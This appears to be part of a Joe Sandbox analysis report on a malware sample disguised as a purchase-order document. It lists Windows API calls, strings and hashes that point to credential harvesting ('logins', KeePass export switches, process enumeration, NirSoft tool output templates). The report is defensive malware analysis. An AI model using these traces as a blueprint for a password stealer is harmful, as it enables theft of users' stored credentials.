                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                              • String ID: logins$null
                                                              • API String ID: 2148543256-2163367763
                                                              • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                              • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                              • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                              • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                              APIs
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                              • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              • memset.MSVCRT ref: 004085CF
                                                              • memset.MSVCRT ref: 004085F1
                                                              • memset.MSVCRT ref: 00408606
                                                              • strcmp.MSVCRT ref: 00408645
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                              • memset.MSVCRT ref: 0040870E
                                                              • strcmp.MSVCRT ref: 0040876B
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                              • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                              • String ID: ---
                                                              • API String ID: 3437578500-2854292027
                                                              • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                              • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                              • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                              • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                              APIs
                                                              • memset.MSVCRT ref: 0041087D
                                                              • memset.MSVCRT ref: 00410892
                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                              • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                              • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                              • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                              • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                              • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                              • GetSysColor.USER32(0000000F), ref: 00410999
                                                              • DeleteObject.GDI32(?), ref: 004109D0
                                                              • DeleteObject.GDI32(?), ref: 004109D6
                                                              • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                              • String ID:
                                                              • API String ID: 1010922700-0
                                                              • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                              • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                              • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                              • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                              APIs
                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                              • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                              • malloc.MSVCRT ref: 004186B7
                                                              • free.MSVCRT ref: 004186C7
                                                              • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                              • free.MSVCRT ref: 004186E0
                                                              • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                              • malloc.MSVCRT ref: 004186FE
                                                              • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                              • free.MSVCRT ref: 00418716
                                                              • free.MSVCRT ref: 0041872A
                                                              • free.MSVCRT ref: 00418749
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: free$FullNamePath$malloc$Version
                                                              • String ID: |A
                                                              • API String ID: 3356672799-1717621600
                                                              • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                              • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                              • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                              • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp
                                                              • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                              • API String ID: 2081463915-1959339147
                                                              • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                              • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                              • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                              • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                              • API String ID: 2012295524-70141382
                                                              • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                              • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                              • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                              • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                              • API String ID: 667068680-3953557276
                                                              • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                              • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                              • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                              • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 004121FF
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                              • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                              • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                              • SelectObject.GDI32(?,?), ref: 00412251
                                                              • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                              • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                              • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                              • SetCursor.USER32(00000000), ref: 004122BC
                                                              • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                              • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                              • String ID:
                                                              • API String ID: 1700100422-0
                                                              • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                              • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                              • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                              • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 004111E0
                                                              • GetWindowRect.USER32(?,?), ref: 004111F6
                                                              • GetWindowRect.USER32(?,?), ref: 0041120C
                                                              • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                              • GetWindowRect.USER32(00000000), ref: 0041124D
                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                              • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                              • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                              • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                              • String ID:
                                                              • API String ID: 552707033-0
                                                              • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                              • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                              • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                              • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                              • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                              • strchr.MSVCRT ref: 0040C140
                                                              • strchr.MSVCRT ref: 0040C151
                                                              • _strlwr.MSVCRT ref: 0040C15F
                                                              • memset.MSVCRT ref: 0040C17A
                                                              • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                              • String ID: 4$h
                                                              • API String ID: 4066021378-1856150674
                                                              • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                              • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                              • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                              • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$_snwprintf
                                                              • String ID: %%0.%df
                                                              • API String ID: 3473751417-763548558
                                                              • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                              • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                              • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                              • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                              APIs
                                                              • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                              • KillTimer.USER32(?,00000041), ref: 004060D7
                                                              • KillTimer.USER32(?,00000041), ref: 004060E8
                                                              • GetTickCount.KERNEL32 ref: 0040610B
                                                              • GetParent.USER32(?), ref: 00406136
                                                              • SendMessageW.USER32(00000000), ref: 0040613D
                                                              • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                              • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                              • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                              • String ID: A
                                                              • API String ID: 2892645895-3554254475
                                                              • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                              • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                              • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                              • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                              APIs
                                                              • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                              • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                              • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                              • GetDesktopWindow.USER32 ref: 0040D9FD
                                                              • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                              • memset.MSVCRT ref: 0040DA23
                                                              • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                              • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                              • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                              • String ID: caption
                                                              • API String ID: 973020956-4135340389
                                                              • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                              • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                              • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                              • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                              APIs
                                                              Strings
                                                              • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                              • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                              • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                              • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
